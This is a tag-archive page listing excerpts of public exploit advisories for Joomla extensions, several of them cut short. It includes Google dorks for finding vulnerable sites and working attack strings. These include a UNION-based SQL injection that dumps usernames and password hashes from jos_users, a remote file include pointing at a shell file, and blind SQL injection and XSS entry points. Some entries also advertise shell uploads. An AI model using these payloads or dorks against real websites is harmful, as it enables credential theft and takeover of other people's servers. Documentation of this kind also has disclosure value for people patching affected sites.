Tag archives: joomla

 

Joomla Discussions SQL Injection

# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct [...]

 

Joomla Component com_s5clanroster Sql Injection Vulnerability

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : inurl:”com_s5clanroster”
.:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions
####################################################################

===[ Exploit ]===

Sql Injection:
==============

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null’+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users– –

####################################################################

# BB720E99B11BBA96 1337day.com [2013-05-17] B1254A136A7E866F #

 

Joomla x-shop

Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
--------------------------------------------------------------------------------

Google Dorks : allinurl:"/com_x-shop/"

--------------------------------------------------------------------------------

Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047

--------------------------------------------------------------------------------

Bug in admin.x-shop.php

<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();

--------------------------------------------------------------------------------

Exploit:

http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All [...]

 

Joomla Jnews 8.0.1 Cross Site Scripting

# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1(latest) and earlier
# Google Dork: inurl:com_jnews

Description:

The vulnerability with Open-Flash Chart is a known vulnerability, however it is integrated with com_jnews, The get-data [...]

 

Joomla Phocagallery 3.0.0 / 4.0.0 Cross Site Scripting

# Exploit Title: Joomla com_phocagallery Plupload Flash XSS
# Release Date: 13/05/2013
# Author: Rafay Baloch And Deepankar Arora
# Contact: http://rafayhackingarticles.net
# Vendor: phoca.cz
# Versions Affected: 3.0.0 – 4.0.0
# Google Dork: inurl:com_phocagallery

Description:

The vulnerability with plupload with a known vulnerability, however com_phocagallery uses it, The id parameter is not [...]

 

Joomla DJ Classifieds Extension 2.0 SQL Injection

# Exploit Title: Joomla – DJ Classifieds – Time-Based Blind SQL Injection
# Google Dork: inurl:”index.php/dj-classifieds/” or inurl:”/dj-classifieds/”
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: –
# Version: 2.0
# Tested on: Linux

Link: http://server/joomla/index.php/dj-classifieds/

Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]

# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0 [...]

 

 

Joomla! 3.0.3 PHP Object Injection

------------------------------------------------------------------
Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability
------------------------------------------------------------------

[-] Software Link:

http://www.joomla.org/

[-] Affected Versions:

Version 3.0.3 and earlier 3.0.x versions.
Version 2.5.9 and earlier 2.5.x versions.

[-] Vulnerability Description:

The vulnerable code is located in /plugins/system/remember/remember.php:

34. $hash = JApplication::getHash('JLOGIN_REMEMBER');
35.
36. [...]

 

Joomla Janissaries Civicrm Shell Upload

<?php /* [...]

 

Joomla Collector Shell Upload

# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013

# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP

# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]

2- [...]